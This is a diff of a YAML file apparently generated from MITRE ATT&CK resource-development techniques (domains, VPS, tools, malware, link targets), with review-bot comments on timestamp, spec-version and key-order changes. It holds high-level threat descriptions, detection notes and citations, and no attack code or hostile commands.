- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
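Review bot: the new final paragraph of T1583.001 introduces `(Citation: Invictus IR DangerDev 2024)`, which is only defined several hunks later in `external_references`; that resolves by `source_name`, so it is fine, but the two hunks should be read together. The `x_mitre_version` bump from '1.3' to '1.4' in the next hunk matches the content change. The split of the `|-` literal block into separate paragraphs and the added clause "(including one-time, single use domain names)" are the other textual changes; everything else in the hunk is the spec-version and `modified` update.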
@@ -52277,7 +52950,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -52316,6 +52989,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52371,7 +53048,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -52429,7 +53105,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -52509,7 +53184,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -52569,7 +53243,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -52591,7 +53264,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -52610,42 +53283,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -52654,22 +53295,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
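Review bot: T1583.003 gets the same treatment as T1588.004: the fields removed in the preceding hunk (`id`, `type`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`) come back here with identical values but a new key order, plus explicit `revoked: false` and `x_mitre_deprecated: false`, `x_mitre_attack_spec_version: 3.2.0` replacing the removed 2.1.0, and `modified` moving to 2024-10-15. The four reference URLs and retrieval dates are unchanged and `x_mitre_version` stays at '1.1', so the `modified` bump reflects metadata-only changes upstream. Verify that `x_mitre_modified_by_ref`, removed next to `x_mitre_version` and re-added at the end, appears exactly once in the resulting object.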
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -52683,7 +53355,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -52770,11 +53442,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
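Review bot: the `modified` timestamp for T1586 regresses from 2023-05-09 to 2023-04-11 in this hunk, and the same backwards movement appears for T1584.005, T1585.001, T1587.004 and T1608.003 further down; a `modified` value going backwards usually means the generator is now reading a different field or a different ATT&CK bundle than before, so confirm these are the upstream STIX `modified` values rather than an artifact of the regeneration. The accompanying removal of `spec_version: '2.1'` is consistent with the rest of the change.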
@@ -52834,7 +53505,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -52876,7 +53546,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -52891,7 +53561,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -52982,11 +53651,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53019,15 +53687,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
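Review bot: in the reflowed description, "one-time, single use links" should read "single-use" (hyphenated compound adjective), and the parenthetical largely restates "uniquely generated"; also, this hunk changes description wording without showing the `x_mitre_version` line, so check that the version bump that ATT&CK pairs with a content change is present elsewhere in the T1608.005 object.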
@@ -53111,7 +53780,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53165,7 +53833,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -53216,36 +53883,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
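Review bot: this hunk removes the `external_references` entries for `Recorded Future Beacon 2019` and `Analyzing CS Dec 2020` while the retained description on the last context line still carries `(Citation: Recorded Future Beacon 2019)`; the object only stays consistent because the next hunk re-adds both references at the end of the object, so these two hunks must land together and never be split across commits or partial applies.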
@@ -53254,21 +53895,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
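Review bot: most of this hunk is key reordering (`x_mitre_contributors`, `x_mitre_domains`, `x_mitre_platforms`, `type`/`id`/`created` moved after the detection text) rather than a data change, which turns a small metadata refresh into a full-object rewrite and hides the real edits: `revoked: false` added, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, and the Recorded Future URL moving to `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` with a refreshed retrieval date. Suggest the generator emit keys in a stable order so future diffs show only substantive changes.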
@@ -53314,17 +53981,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -53350,7 +54016,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -53382,8 +54048,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
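Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1585.001 with nothing added in their place, whereas the other objects in this change keep `x_mitre_attack_spec_version` (typically bumped to 3.2.0); the earlier hunk for this object (`@@ -53350,7 +54016,7 @@`) touches only `modified`, so check that the attribute is re-emitted somewhere in the T1585.001 object, otherwise it loses its spec version entirely. The same pattern applies to T1587.004 and T1608.003 below.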
@@ -53410,7 +54074,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53434,8 +54098,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -53461,7 +54123,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -53495,8 +54157,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -53544,7 +54204,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -53560,7 +54220,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -53619,54 +54278,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
